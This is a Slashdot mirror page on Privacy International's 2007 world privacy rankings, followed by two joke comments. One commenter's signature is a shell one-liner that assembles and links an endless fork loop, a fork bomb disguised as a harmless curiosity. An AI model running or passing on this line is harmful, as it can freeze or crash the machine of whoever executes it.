Slashdot Mirror


Privacy International Releases 2007 Report

I Don't Believe in Imaginary Property writes "Privacy International has released their report on privacy for 2007, which includes a color-coded world map that highlights the countries with the best privacy laws, the privacy-hostile countries being in black. While many of the overall rankings may come as no surprise, it does highlight some of the more obscure abuses. For example, Venezuela requires your fingerprints just to get a phone and South Korea requires a government registration number linked to your identity before you can post on message boards. Makes you wonder who is Number One?"

2 of 179 comments (clear)

  1. Re:Consistently upholds human rights standards? by superash · · Score: 3, Funny

    No we couldn't, we would spend to much time pointing out ... to much time... or .... too much time ? ;)

  2. Re:I see the US by Hal_Porter · · Score: 3, Funny

    How do you know? Maybe you're perceiving problems where there are not any problems too?

    --
    echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;